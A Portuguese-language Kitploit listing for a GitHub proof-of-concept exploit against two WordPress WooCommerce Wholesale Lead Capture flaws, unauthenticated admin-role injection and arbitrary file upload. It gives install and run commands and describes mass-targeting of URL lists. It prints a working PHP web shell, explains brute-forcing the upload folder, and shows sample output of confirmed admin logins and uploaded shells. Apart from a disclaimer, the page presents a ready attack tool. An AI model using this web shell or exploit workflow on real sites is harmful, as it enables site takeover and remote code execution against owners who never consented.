Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

Privilégio sem Autenticação | Upload Arbitrário de Arquivos sem Autenticação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
26há 4 mesesAinda não revisado

SVG de digitação


🔴 Visão Geral da Vulnerabilidade

CVE-2026-27542 — Escalação de Privilégios Não Autenticada

Descrição:
O plugin WooCommerce Wholesale Lead Capture para WordPress é vulnerável a Escalação de Privilégios Não Autenticada em todas as versões afetadas conhecidas. A vulnerabilidade existe no manipulador da ação AJAX wwlc_create_user, que processa solicitações de registro de usuário sem sanitizar ou validar adequadamente os campos de função fornecidos pelo usuário. Um atacante remoto e não autenticado pode criar uma solicitação POST especialmente formulada que injeta campos arbitrários de capacidade do WordPress — incluindo wp_capabilities[administrator] — diretamente nos metadados do usuário no momento da criação da conta. Isso permite que o atacante se registre como administrador do WordPress sem qualquer autenticação prévia ou interação de um usuário legítimo, resultando em comprometimento total da instalação do WordPress afetada.


CVE-2026-27540 — Upload Arbitrário de Arquivo Não Autenticado

Descrição:
O plugin WooCommerce Wholesale Lead Capture para WordPress é vulnerável a Upload Arbitrário de Arquivo Não Autenticado em todas as versões afetadas conhecidas. A vulnerabilidade reside na ação AJAX wwlc_file_upload_handler, que é registrada sem qualquer requisito de autenticação ou verificação de nonce. Ao enviar uma solicitação POST multipart especialmente formulada para /wp-admin/admin-ajax.php, um atacante remoto não autenticado pode enviar arquivos de tipo arbitrário — incluindo web shells PHP — para o diretório wp-content/uploads/ do servidor em um subdiretório wwlc-temp-* gerado dinamicamente. A exploração bem-sucedida leva à Execução Remota de Código (RCE) no servidor web subjacente, operando como a conta de usuário do processo web.


🛠️ Descrição da Ferramenta

Este é um script de exploração Prova de Conceito (PoC) para as duas vulnerabilidades críticas descritas acima, direcionando instalações WordPress que executam o plugin WooCommerce Wholesale Lead Capture. A ferramenta suporta dois modos de ataque independentes:

ModoTipo de AtaqueObjetivo
Modo 1Upload Arbitrário de Arquivo Não Autenticado + Descoberta de pasta por força brutaEnviar um web shell PHP e localizá-lo por meio de adivinhação de pasta em várias camadas
Modo 2Escalação de Privilégios Não Autenticada via RegistroAutorregistrar-se como Administrador do WordPress e verificar o acesso de administrador

📋 Requisitos

Requisitos do Sistema

  • Python 3.8 ou superior
  • Acesso à internet para o(s) alvo(s)
  • Linux / Windows / macOS

Dependências Python

root@kitploit:~
pip install requests urllib3 colorama

Ou instale via arquivo de requisitos:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ Uso

Execução Básica

root@kitploit:~
python3 CVE-2026-27542_CVE-2026-27540.py

A ferramenta apresenta uma interface interativa de terminal. Você será solicitado a fornecer todos os parâmetros necessários.


🗂️ Formato da Lista de Alvos

Crie um arquivo de texto simples (por exemplo, list.txt) com uma URL de destino por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 Modo 1 — Upload de Arquivo + Força Bruta de Pasta

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

Exemplo de arquivo de shell (shell.php):

root@kitploit:~
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

Nota: A pasta wwlc-temp-* é gerada dinamicamente pelo plugin usando uniqid('wwlc-temp-') do PHP. A ferramenta usa uma estratégia de força bruta em várias camadas para descobri-la:


🟠 Modo 2 — Registro + Injeção de Função + Verificação de Admin

root@kitploit:~
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

A ferramenta:

  1. Descobre o formulário de registro do WWLC e extrai um nonce válido
  2. Envia um payload de registro especialmente elaborado, injetando a função administrator
  3. Tenta fazer login com as credenciais criadas
  4. Verifica o acesso ao painel administrativo em vários endpoints administrativos do WordPress
  5. Salva os acessos de administrador confirmados no arquivo de saída

📁 Arquivos de Saída

ArquivoDescrição

Exemplo de Saída (Modo 2 — Acesso de Administrador)

root@kitploit:~
[INFO]    Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO]    https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2

Exemplo de Saída (Modo 1 — Shell Encontrada)

root@kitploit:~
[INFO]    Mode1 | Target: https://target.com
[INFO]    https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO]    https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO]    https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s

📡 Contato e Autor

Por: Nxploited (Khaled Alenazi)

 


⚠️ Aviso Legal

ESTA FERRAMENTA É FORNECIDA APENAS PARA FINS EDUCACIONAIS E DE PESQUISA DE SEGURANÇA AUTORIZADA.

O autor, Nxploited (Khaled Alenazi), e todos os colaboradores deste projeto não endossam, apoiam ou assumem qualquer responsabilidade pelo uso indevido desta ferramenta ou por qualquer dano causado pelo uso deste software contra sistemas para os quais você não possui autorização escrita explícita.

  • ✅ Permitido: Uso em sistemas que você possui ou para os quais recebeu permissão escrita explícita para testar.
  • ❌ Proibido: Uso contra qualquer sistema sem autorização escrita explícita prévia do proprietário do sistema.

O acesso não autorizado a sistemas de computador é ilegal e punível pelas leis aplicáveis, incluindo, mas não se limitando ao Computer Fraud and Abuse Act (CFAA), ao Computer Misuse Act (CMA) e à legislação equivalente em todo o mundo.

Ao usar esta ferramenta, você aceita a responsabilidade exclusiva por suas ações e confirma que tem autoridade legal para testar os sistemas visados.

O autor não assume nenhuma responsabilidade por quaisquer danos diretos, indiretos, incidentais ou consequenciais decorrentes do uso ou uso indevido deste software.


© 2026 Nxploited (Khaled Alenazi) — Somente para pesquisa de segurança autorizada.

Baixar ferramenta
CampoDetalhes
ID CVECVE-2026-27542
GravidadeCRÍTICA — Pontuação CVSS v3.1: 9.8
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Componente AfetadoPlugin WooCommerce Wholesale Lead Capture (WWLC) para WordPress
Tipo de VulnerabilidadeEscalação de Privilégios Não Autenticada
Autenticação NecessáriaNenhuma
CWECWE-269: Gerenciamento Inadequado de Privilégios
CampoDetalhes
ID CVECVE-2026-27540
GravidadeCRÍTICA — Pontuação CVSS v3.1: 9.8
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Componente AfetadoPlugin WooCommerce Wholesale Lead Capture (WWLC) para WordPress
Tipo de VulnerabilidadeUpload Arbitrário de Arquivo Não Autenticado (levando a Execução Remota de Código)
Autenticação NecessáriaNenhuma
CWECWE-434: Upload Irrestrito de Arquivo com Tipo Perigoso
CamadaEstratégiaDescrição
0Listagem de DiretórioTenta listar o diretório de uploads se estiver aberto
1Baseado em PadrãoAdivinhações numéricas sequenciais e derivadas do tempo
2Hex Baseado em TempoSemeadas por carimbos de data/hora observados nas solicitações HTTP
3Hex AleatórioAdivinhação de string hex aleatória pura
scan_results/wwlc_uploads.txt
Todos os sites onde o upload de arquivo foi bem-sucedido (Modo 1)
scan_results/wwlc_shells_found.txtURLs completas de shells confirmadas como acessíveis (Modo 1)
scan_results/wwlc_register_results.txtTodos os resultados das tentativas de registro com credenciais (Modo 2)
scan_results/Admin_login.txtAcessos de administrador confirmados com credenciais (Modo 2)